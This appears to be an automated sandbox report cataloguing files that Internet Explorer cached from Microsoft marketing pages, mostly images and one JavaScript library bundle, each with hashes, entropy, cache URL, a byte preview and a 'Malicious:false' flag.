                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1399_Panel15_Mosaic_Item5_FingerPrint[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 350x400, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):26088
                                                                                                                                                                                                              Entropy (8bit):7.942233753771342
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:fy8C0bacfZ7l2HfQB60+UKxkAO6VJSUJLYEZs5NCyT+wLKaOqaRHnxJqjQl/yIXS:i8RZc0+w6BLWCyTTLKHHnFyIj3kR81sd
                                                                                                                                                                                                              MD5:703BDFFEFD1C6758A7884BFF3DA2BB72
                                                                                                                                                                                                              SHA1:176CD04D527D03E251BC4CCF81F6CB68F8EA1467
                                                                                                                                                                                                              SHA-256:D68542EBE4F78EBDE576020EC2BD9090FE0A62628DC6D50D7C08F0BE1FFE251E
                                                                                                                                                                                                              SHA-512:24496BCAD5BEBD724BE075C12DEF8248CF5A18686592BBCE5332884FAC76DCB1591BDD19B67F10996DAFD7A226981CA1EAF1C97B5667BEFB4EE2AA5E5CCF2A0D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1399_Panel15_Mosaic_Item5_FingerPrint.jpg?version=1fb06e9f-bd06-3551-9a71-2df55142f736
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................^....................................................D...gI$.K...3...:I.~....FL..x..&.gN.I..>.$.I...%.e..;;)2I.fEI;:L..I..VRi2vL.Q..2xi;&vI:d.$..v....r.Ob.I:d.I$.F...I....2..n..;4.A.2..4.!..v.u))M.)..n..3..0.n...-m......yI<.R..b..O...&.d.f.e.M.h.R...RL.).[.v.....S.I.i4.RwwR..ND..C...X.{....Wy<]....R...h.+..-..j.F.{..m$..www...Sr.S!JSX5..m..zWx.q.wwR.....7..#L.1Ob.........III...)M."".!LS..g.j..B...u'R...9<..$.B.E..sY.b..W/].v...H.t..w....B.E...F.1l..,.d..d&gwww......z...y..z ...).....?/...[b.....M.[_{w...W.....1m$R..b....0^..-..:t..f.om....G....h....+`X1.X.n..-s&..9.j.t...{g..'.gY]..7H[+..=.S....Y.n.2..........b..6^..c.t....+a.X..._c..9.`.l...b.9.......1,K..%..g..+.e...u.?V......cX.b......g...As..w.k..B.l{.7@iK.Fe.cx..........f>e..f.G.i.|.......|....U;^...P..by..m.g..X.f....{S/.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\17-f90ef1[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):135290
                                                                                                                                                                                                              Entropy (8bit):5.2254562447372
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:1f/HuFzpxJIS20i9d1EwgXA95KSqDCE4t:1f/HuXIZRjt
                                                                                                                                                                                                              MD5:07CB1B6723F61F949C862B399E06B3BF
                                                                                                                                                                                                              SHA1:83ABC38AB7E787F719E859E3EA97D4A634FE61FC
                                                                                                                                                                                                              SHA-256:82A7ACB7D942575069E4067375BEC0C33F1949EA2864BE8BD12E9D6DB74A345D
                                                                                                                                                                                                              SHA-512:D520D31E12A3D2D316347D96E4E3D20D7E5C988A4824228097D1DF0A5AB3F12334096C2ADD5D0A7345EF8A2E674712F84D9F8CFC2E973A2A4DEDA546337C94CD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/bb-d7480b/db-bc0148/dc-7e9864/6d-c07ea1/9d-b58f60/f6-aa5278/cd-23d3b0/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/69-13871c/b7-0ad59f/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/17-f90ef1?ver=2.0&_cf=20210415&iife=1
                                                                                                                                                                                                              Preview: (function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1920_Panel01_Hero_Learn[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 1920 x 720, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):862690
                                                                                                                                                                                                              Entropy (8bit):7.998639583220839
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:24576:sXoB3LYBgSKMJzwBRNkh8QQW1Rk2Db9uIo5/Gw5frS6c:sX6bYJJzOkKAR3Db9sXRZc
                                                                                                                                                                                                              MD5:4739D66F17FE60C8FB9501C182D04E7C
                                                                                                                                                                                                              SHA1:DF7872DAB8400866C68484FE1A14E0CBC4D2177B
                                                                                                                                                                                                              SHA-256:55A8EE79FB6E7925F99AED9D16F614D5A89B0F4C0227CC4F04D0DF8D20B9DBFB
                                                                                                                                                                                                              SHA-512:783221D753ACE1D9B1A43A5FAC601B3717CF399B3C7C9BC5B8DD52F9B193632FAE3844BF5D47BEE1D0F79351E303831CB0B8318079EAD2FCB96AFE37352C0AC7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel01_Hero_Learn.jpg?version=28c94a0f-9ec9-97eb-b61f-25f68b111d90
                                                                                                                                                                                                              Preview: .PNG........IHDR..............v......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:bd6b766a-8765-2046-b913-746b70ca392a" xmpMM:DocumentID="xmp.did:538113AD84F711EB9827B02B182DE319" xmpMM:InstanceID="xmp.iid:538113AC84F711EB9827B02B182DE319" xmp:CreatorTool="Adobe Photoshop 21.1 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:ce62253a-48d3-c644-8f0d-272384290749" stRef:documentID="adobe:docid:photoshop:87e2b43b-e132-9141-81e6-cf03e3ea0fd1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.y.(..%.IDATx....m.u...o
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1920_Panel05_PriorityFeature_GetThingsDone[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1040x585, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):80543
                                                                                                                                                                                                              Entropy (8bit):7.934604031810399
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:0cQxZtUTe5zi2LtMuAJ5csKi0Oav3jMBsmBjTVHsW3KMBqR9Aeh:05xbUq5zig2J5csKH4SmBaW3KMMgeh
                                                                                                                                                                                                              MD5:7949AB2316B143F0F821FDB64378732E
                                                                                                                                                                                                              SHA1:1824FF40D53DD71B0F2EE9A6627B3B967B42AF6B
                                                                                                                                                                                                              SHA-256:A7AEB19A813C1CFAAF82D0F24C41FC624BE289C7C01475D6C3D8DFF566E4C4AF
                                                                                                                                                                                                              SHA-512:99A1A91EA4F3C37C8ADDC8B0F22FDBC5B83F031764D3588C23EB28BB6D723716C22BCC58AEED474AA9FE3BAD9006B9C404AFDB1A2610B09583A9F19E99B8F521
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel05_PriorityFeature_GetThingsDone.jpg?version=26655609-1c29-c3f3-4795-badd817e0fb8
                                                                                                                                                                                                              Preview: ......JFIF......................................................................................................................................................I......................................................Zc..')9I..NNC.r.4...L..L..$.R..b....0Q.`....1.TTTTRH....C.$ND.".nRl.$.@..&......$...Tc....F1...a.....E(....f...&.)9...&..&.I.........IE%....1Q.T.a...EF.*1.Q#. CM=......&.'"L.&9.....`....W..K..I%......1Q..#..1.c...F*1I$.......&..)...H.&.6......w.wW7.E.T.R....E$......*..c..0QPPQ.TR.QI.... .Cm....I..)..`....].]]F.8.!.p.)Z..*)EF1Q..c..1.c..1PQ..R.J"C@..&2@.....99.' C.L......B0.c....(cb..Q....*1.c..1.c..1.Tb..F"D@`..lcm.2NRs......i.&k}fj1PQ..c..0.gh.J)F1QPP..c..B*1..Tc..Q.G.h...Lcm.rr..H.i.`......1Q.T#..0.d$..Tb...(.B*.Q."...1QQIE!.i.wI..C%'')99.m.H`&.....J.Q.T"...1.N.$..b..c..F1..c..1Q.b.....@.......!..r.)..r&6.&......%N...c..F1.i..QQJ1..c..F1.c..B1Q.b....J.+...n..:Cl..nSrrl.$.H......]..a..1.c.....m$..Tc...EB1.c..1.b.......O'...m$i....nRr.7).A .........T...F....".n.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1920_Panel09_4Up_VisionTool[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):22071
                                                                                                                                                                                                              Entropy (8bit):7.972488799944556
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:f3WV0NopEFPaiXUDqe6ZkUVtUP8qT1Ty4R46tZheI1Eg0PSClCjcq:/FN1FPc+ZkUVWxT1T9R464Iqdls
                                                                                                                                                                                                              MD5:BC7AED9975732405BD166935D6A41EFC
                                                                                                                                                                                                              SHA1:A1240A865C9A0FBFBF59B8139806E4F48CA3C0C7
                                                                                                                                                                                                              SHA-256:5B580FA42DB3FB4729764E7D37BB31E48D6621B39F928EC22C6BF596734ED1B9
                                                                                                                                                                                                              SHA-512:C716DCAEB660E84D4339F1F23F3BA909B48FBC924E60BDC3D579DDA66D1AEBDF89C1574F220B7B87B9BDE437F9696F0ED12B300826E79FD85F46515923529434
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel09_4Up_VisionTool.jpg?version=f136feae-cc6a-f8c5-fa7e-3ba320f975d5
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................f.....................................................F..~..).re..."x...Tj..k.n...T=...hJ...s;....YUTS<.L,...PyX..k.@..S.3..(...M.Q...o.8Yu.QL...`..I...Pu..A8.............G...\:Y.......p.hi..@"m...=...KJ..j.e|*3.[.6MGyW3......P...,.......c@.Fb...e.y.)U.......7N..d..B!.....9.D....w...i.l..6N...Qf..$...9-.8..d.#.5.....V.=w..U..N.Hb..u.?.c..XffP.d.M..=(RXG!l.=...i..a..t....a.C\T.g..%.kFU=.~=>....$.op..k.;...QT1..3.vy....as..jV.x.-.er...^...83/Q.I5=.r7.Px.{....n.R....C. ....l.@....X.27$n<r...O.C'.#.*.$.\....:.-...6a.o.E.#3.;G4.Rv..{&..............K<).Q...j....?....".bY...w.........J!....0.)...eE.,.j gJl|..kKV.i..>!.F....R.!65[.U.e...N...$.4D...).=O[*......+..+.%.~)V...|..h...q...b0.....+..'+.....)...~.T........%...m.Z..4...Xk.$.4.....Wg...m.4~.\.V...>=1.62..D,BM.O[/.T.w...,M.X.+.*[!'
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1920_Panel14_2Up_Windows10Pro[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 740x417, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):86814
                                                                                                                                                                                                              Entropy (8bit):7.986027164403489
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:B5fk4UFF7FBWH8FTZMDikG2IhDPIsBMlk0E4wLIJ7j27fRpmEpBiprgc2S:B5fC/7FTZMDi92IhDPIjl6IJ7CRiprh
                                                                                                                                                                                                              MD5:5151E7B1B0D609E7BD36FBE000ACF8B1
                                                                                                                                                                                                              SHA1:B698B876CDAA190408EF96A8B771A4F2215A9280
                                                                                                                                                                                                              SHA-256:EE8059A6BCF5A90CC552C7EFA41C6561384BC061035BDA8D6AD1893A85C6CFF8
                                                                                                                                                                                                              SHA-512:941AF557B506344331756DB495DBCADDB07DA3B80A2B225F83D021B27A8FD206639FF8BFADE3C0E490A2DA34E51B605D3EF93AC7945CE1CC4F78F8961BB7AEE9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel14_2Up_Windows10Pro.jpg?version=5bd63bc4-65f7-c238-ad66-c64c0d11f5d7
                                                                                                                                                                                                              Preview: ......JFIF..............................................................................................................................................................................................................i.9.P.(&.2...?X....I.......<s.i7..q1./.........^..........JR.5.QEUP.!Vx.H8.|.......D....tc<.e.i.s.aY..a0..L._.,......@...R..JT....l.G..;U.U...65.bq.I1...l..={....9.p.."c...c..M.zT...@..8.(...U.]D.G wnT.{hT..9.n.P.(.4Q!.1.=.W...G..1.;.a1.c5....<....P.q@....P.....$i...p........YE..$M....f...0.A<...........HL.%.{q........pq@...(!..D....u.X...wj..(a'..%I........c.A.i.@.....)eQ...s.....(........$1[R.....`......y.....S.A.J)..>1.6..;...(.W.).c.M_.$...Fg.a.e.L.(...;...R...^i......e.9]V...u..;...M4.M\.Jr.....U.QC..`.0.%]....'..t...R.......!KI..4\.......p.<.r.....SIB.4.1.]Z?......=W.*[n.0.&.0.$."-..[..R.wq@...)..jGM..p...E.9W.~A._(.c......eq.k../......<........8B .SJ".)..E..../..p....V0.+.YnptL.WP.7....e.?..F..M..........G;.A..n.K...$...t..r@........
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1920_Panel15_Mosaic_Item1_Gray[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, little-endian, direntries=0], baseline, precision 8, 890x400, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):15776
                                                                                                                                                                                                              Entropy (8bit):7.430669868094102
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:wy93GvSFm2UHh+sfD0CHb3AEUTyeMcn/pVuc0JlmwW:wCGvSF6JfD0CHbwEUTyeMc/pkc0Hm
                                                                                                                                                                                                              MD5:18745574B82CD2657FE5469381124E0F
                                                                                                                                                                                                              SHA1:F90EE5A06FFB4446A173E33C9958839CA642FB82
                                                                                                                                                                                                              SHA-256:B550A20C433EA98D69FC606003183CF0CBDD955DC0B9C9AF59BF3E3F6B60AAC8
                                                                                                                                                                                                              SHA-512:1BC4B696957D81BF560FEA88E45EB47240824A8A58CB70F2D9A4610B4DD00CDFB2D9F03CBBCDEE54D9FC5370BD35CD3090473F211C0C0257A7BFBBC1ECAC9233
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel15_Mosaic_Item1_Gray.jpg?version=df68d82a-b81b-b310-e0da-f49a63a83107
                                                                                                                                                                                                              Preview: ......Exif..II*.................Ducky.......K......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A67AEAFA5CB911EA88EEDBD181122FD0" xmpMM:InstanceID="xmp.iid:A67AEAF95CB911EA88EEDBD181122FD0" xmp:CreatorTool="Adobe Photoshop 2020 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="8F6B98E30D2E75BCEAE1C4EA6B2EEB5C" stRef:documentID="8F6B98E30D2E75BCEAE1C4EA6B2EEB5C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1920_Panel15_Mosaic_Item2_Apps[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 425x425, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):33753
                                                                                                                                                                                                              Entropy (8bit):7.971163442571784
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:Gtpqngm9Y+IRYxML+xMMNfID6UaM+bqWf/WkkDad1mC:0MgDiQ5mQ/N22rDep
                                                                                                                                                                                                              MD5:163AE76EE04CF2E69F57E4B35FA10266
                                                                                                                                                                                                              SHA1:1A39E9C38F863ECD62FB9DC0D7A1C730C840B6E0
                                                                                                                                                                                                              SHA-256:9C90311B80F54C53E9ABB4C146325ED71A17D566948D75199474373B44A028EA
                                                                                                                                                                                                              SHA-512:66E16A68D91D90133B673FF3CCAB1E271DDB54ED2BA45CE75C718D6C86493F77C583FBDA87AAA498742402612564047C41DA6A07337ABC182AEAB8E343FE9F38
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel15_Mosaic_Item2_Apps.jpg?version=89cd3a8f-76f7-64b9-0fa0-72a1bbf1bb90
                                                                                                                                                                                                              Preview: ......JFIF...............................................................................................................................................................................................................4.66.BY..U-v..r....s.1..P.D..=..db..Y.. z...<>...!..L.A."..k.9.<....0...6..1"a..&.%.x..y..X=b..*?..C.6.fc.h.|.=.G..e.UO4..=.....Z`.Y.b.7..45.NmR...r.>g..=...h...CC`5.y...x...h.h..L.H@6.X.. LY...6.d....Dh.?I.f0.0.h.4.C`....1.......~...4.H...`..z-....b.5...S.>.t.......1bm.'.)].F....5.1F..)T...y........,.Z.....=.RxV+....#O?.P.j.K..C-M4.d#$....f.!n..;\...n./....0y.O>......10..z..-...m.2.Q..........~....fz..}....`.b..N..<Q..:...0.....:.........5*-.B..^..Md..s...)0.3......`1.U..z[M%.bm..c..0....O.=........|X.b2.Q........t.=..`4.......&..........`.2.4^'vs9.=|........u...=w.P._..>{......#Q.]....... i.`..m..[...m..|..*Y.,2...zU.u.. ....{m}(..M.o....C...X.Y.Z.......;.|.[h.......8P.}..............>....q.|)Umd../.}c..2...s..>3...f...0...V.t.yW.[~
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1920_Panel15_Mosaic_Item3_Lenovo[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 425x425, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):27942
                                                                                                                                                                                                              Entropy (8bit):7.936119416177169
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:fg+BL+89mhvMDvlVuBHqs43UIZWv5kT2LLlMaHEyVr5IsfTo5L3mYh0jU:I+BS8UmwM3UuwCKVkyVr5IiT8L3mw0o
                                                                                                                                                                                                              MD5:6173503CE3F00A780A6670C9DC70F827
                                                                                                                                                                                                              SHA1:4BC8B0609EE1206C853FCE3D439E88BBD37B6E69
                                                                                                                                                                                                              SHA-256:B682745215FD5A4E6B868EA1F0C74F393FD112F9926ECF778C0302DDD1760C75
                                                                                                                                                                                                              SHA-512:E4704D541438B7D68615AB549E0A86ABEFD3D4E466153D1A71A799F3A463CA32A5BCABE5F2CDFEC507AF1BD579B453984A6397A8B300720FEFD5D581DCC5C63E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel15_Mosaic_Item3_Lenovo.jpg?version=8de5791c-f31b-2106-bbe6-da0d0114083c
                                                                                                                                                                                                              Preview: ......JFIF................................................................................................................................................................................................................%!.N/!2Ri.M.....J1...i1E.q%7 ...!....Q.M.J5.6!....2D..."M........,tn...... $J2cR.'%!$......o...i4.H..3.0m.(..G..`5'.......Z...6..C..j1hm.(....].w..X..d.).A'.......@J....U.......v8..58.L% .AN*I..q.8qj.g.h......TLR.2E.).`A6..x..Zj.\7>....../u..m..$.\.HD......R...\9O5r.......S.E.1L..R# 2.M.........8&...v.........6A.).|'/........9......U. 9.q..&...19.6.'.1.x...5..=.=..Y..8.r.10..&.....s.....e...<G.....\&A.Q.CLMM.1..N..........Wz_.....o.m...JHS..18I........W.&o....g..K.....~.9...RR...&..e..R...o^_....g......H..5.y....<"1.jj)2H%(.2.]._V.{...zr.1z.5....k..;'....Y,i7.62.,.U...^..1a..Q.x-.:....`.....1iA..Bi)MN.#,u*.?.....|[H.x._}......%...v}......I..'..UjZ....y.y=.}Y%?n.&\..{......V<(qLS.D.. S.4.EJ.S._*..?..#.kO....xxG..........F...w.MB.M
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1920_Panel2_LinkNav_Devices[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1167
                                                                                                                                                                                                              Entropy (8bit):4.500982301012084
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:tzS64wjDuIVilIxHsOYsblx41S3siZItiQyQX1qyU9F9602Eo3BR4m5S:hXLuaY+MO7bjM71C+8ojP5S
                                                                                                                                                                                                              MD5:203A9C57827F84239C05FBB71AEC5F76
                                                                                                                                                                                                              SHA1:495C2F881E909BF96ABBCA956BD43D1E322D6EA0
                                                                                                                                                                                                              SHA-256:93FB195EBC9A97EC5FFDEAAE219223E19277182C10829976411ECE6D28662A42
                                                                                                                                                                                                              SHA-512:94EFCD3975FE8ABDA444EEB45A9F0FCE624AB48BDDBA254EF9A40FAEF7F237723066DAEBC00F5AC2979E21C073D1885BFC2AD75843C529342505D97FAE48649D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel2_LinkNav_Devices.svg?version=cf3325f0-e9a4-4439-3cec-04ca1631c441
                                                                                                                                                                                                              Preview: <svg enable-background="new 0 0 64 64" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg"><switch><foreignObject height="1" requiredExtensions="http://ns.adobe.com/AdobeIllustrator/10.0/" width="1"/><path d="m50.05 39.285c.145.144.277.329.396.557s.218.469.297.723.142.508.188.762.069.478.069.673c0 .326-.069.638-.208.938s-.327.566-.564.801c-.238.234-.508.42-.811.557s-.62.205-.95.205h-32.934c-.33 0-.646-.068-.95-.205s-.574-.322-.811-.557c-.238-.234-.426-.501-.564-.801-.139-.3-.208-.612-.208-.938 0-.195.023-.42.069-.674.047-.254.109-.508.188-.762s.178-.495.297-.723.25-.413.396-.557l4.117-4.062v-15.722h27.867v15.723zm-1.583 2.656c0-.052-.01-.127-.03-.225s-.047-.195-.079-.293c-.033-.098-.066-.192-.099-.283s-.069-.156-.109-.195l-4.018-3.945h-24.264l-4.018 3.945c-.04.039-.076.104-.109.195s-.066.186-.099.283c-.033.098-.059.195-.079.293s-.03.173-.03.225l.06.059h32.815zm-27.867-7.441h12.667c0-1.38.264-2.679.792-3.896.527-1.217 1.25-2.278 2.167-3.184.917-.905 1.992-1.618 3.226-2.139s2.55-.781
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1920_Panel_LinkNav_PersonalShop_V2[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2376
                                                                                                                                                                                                              Entropy (8bit):5.0211850066186505
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cMAvf3y6YClc9jQcFESx6oCOPr6NZZf9shFGZ83:WvfC6YClQFFESxHVWNZdmhd
                                                                                                                                                                                                              MD5:AC7359B0D3C07F3C436F8B64E279EBEA
                                                                                                                                                                                                              SHA1:7CCC3AFEAA7E0669069FB38D2E583C979B8FF234
                                                                                                                                                                                                              SHA-256:E0AD01D0402E6C4D87CCCAC0571B7FFE9402CF3FC22ED036B04AFCD16CCCFEFC
                                                                                                                                                                                                              SHA-512:9C22DF160217048FC1F2E6D001D5FFBA38680BD4B6CBD412B7DB583D6B2FDDDAAF5883DEA4CB44DE386C9A8640BBB1539FAEC18CBD6434EC7D5E8649252968FB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel_LinkNav_PersonalShop_V2.svg?version=34def8c2-5109-9555-2860-db5f024de09c
